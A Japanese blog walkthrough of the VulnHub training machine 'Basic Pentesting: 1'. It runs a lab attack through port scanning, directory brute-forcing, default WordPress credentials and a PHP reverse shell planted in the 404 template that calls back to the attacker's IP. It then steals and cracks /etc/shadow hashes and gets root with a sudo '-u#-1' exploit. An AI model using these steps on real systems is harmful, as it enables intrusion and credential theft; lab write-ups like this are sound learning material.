【VulnHub】Basic Pentesting: 1

Basic Pentesting: 1」は、「Josiah Pierce」によって開発され、VulnHubにて公開されているシリーズの一つです。

 

■環境

 Attack machine(parrot OS)IP:192.168.56.101

   Target machine(ubuntu OS)IP:192.168.56.105

 

■手順

  1.nmap(ポートスキャン)

  2.gobuster(ディレクトリ・ブルートフォース・アタック)

  3.wpログイン

  4.404.phpへrevarce shellのコードを作成

  5.passwdとshadowを強奪

  6.john the ripperでhash化されたパスワードをクラック

  7.ssh接続

=========================================================

1.nmap(ポートスキャン)

  以下のコマンドを実施。

  $ nmap -sV -T4 192.168.56.105 -p-

f:id:Alien_Engineer:20210815205051p:plain

 

2.ブラウザーでPort80へアクセス。

 収穫特になし

f:id:Alien_Engineer:20210815205635p:plain

 

3.gobusterを実行

  $ sudo gobuster dir -u http://192.168.56.105/ -w /usr/share/wordlists/dirb/big.txt

f:id:Alien_Engineer:20210815210026p:plain

 

4.gobusterで見つけた/secretへアクセス

 http://192.168.56.105/secret

f:id:Alien_Engineer:20210815210156p:plain

 

5.ブラウザーのアドオンで「wappalyzer」を使用してみたところWPを使用していることが分かった。そこから考察をするにWPの管理ページが存在すると思われる。

f:id:Alien_Engineer:20210815210404p:plain

 

6.再度gobusterを使用して調べる。

  $sudo gobuster dir -u http://192.168.56.105/secret/ -w /usr/share/wordlists/dirb/big.txt

f:id:Alien_Engineer:20210815210818p:plain

 

7.これは経験から取り合ず、admin:adminでログインしたら入れた。

ちゃんとログイン情報を調べるなら色々やり方はあるが、burp suiteでも使えばいいと思う。

【ログイン前】

f:id:Alien_Engineer:20210815210948p:plain

【ログイン後】

f:id:Alien_Engineer:20210815211231p:plain

 

8.「Appearance」→「Editor」をクリックして、右側の404 Templateをクリック。

f:id:Alien_Engineer:20210815211502p:plain

 

9.404.phpへ以下のURLのコードを張り付けて、以下の箇所を変更して、

「Update File」のボタンをクリック。

============================

$ip = '192.168.56.101'; // CHANGE THIS
$port = 1234; // CHANGE THIS

============================

github.com

f:id:Alien_Engineer:20210815211754p:plain

 

10.NetCatを使用してport1234で接続を待ち受ける状態にする。

 $ nc -lnvp 1234

f:id:Alien_Engineer:20210815212021p:plain

 

11.編集した404.phpへアクセスし接続待ちのポートへ接続が確立したことを確認。

 http://vtcsec/secret/index.php/404.php

f:id:Alien_Engineer:20210815212234p:plain

f:id:Alien_Engineer:20210815212333p:plain

 

12./etc/passwdと/etc/shadowをローカルPCへコピーをする

 $ ls -al /etc/passwd

    $ls -al /etc/shadow

f:id:Alien_Engineer:20210815212614p:plain

 

   右側$ cat /etc/passwd

 左側$ vi passwd

f:id:Alien_Engineer:20210815212813p:plain

 

 左側$cat /etc/shadow

 右側$vi shadow

f:id:Alien_Engineer:20210815213015p:plain

 

13.John The Ripperにてpasswdとshadowのパスワードクラック。

$ unshadow passwd shadow > hash.txt

f:id:Alien_Engineer:20210815213502p:plain

 

$john hash.txt

$john hash.txt --show

f:id:Alien_Engineer:20210815214149p:plain

 

14.johnで摘出できたユーザとパスワードを使用して、sshでログイン。

 ユーザ名:marlinspike

    パスワード:marlinspike

f:id:Alien_Engineer:20210815214417p:plain

 

15.色々と調べた結果sudo -uの脆弱性を利用して管理者へ昇格

 $sudo -u#-1 /bin/bash

f:id:Alien_Engineer:20210815214713p:plain

 

16.whoamiコマンドとidコマンドを実施して、以下の表示がされればOK

f:id:Alien_Engineer:20210815214806p:plain

 

◆補足:

sudo の脆弱性を見つけたきっかけになったツールが実はございまして、リンク張っておきます。

github.com

 

これ以外にも、niktoやhydraなどのツールを今回使いました。

 

今までvulnhubを使用して学習をしてましたが、今回初めて答えを見ずに最後までハッキングすることができました。

感動です。

 

このVMを作成してくれたJosiah Pierceさん、ありがとうございます。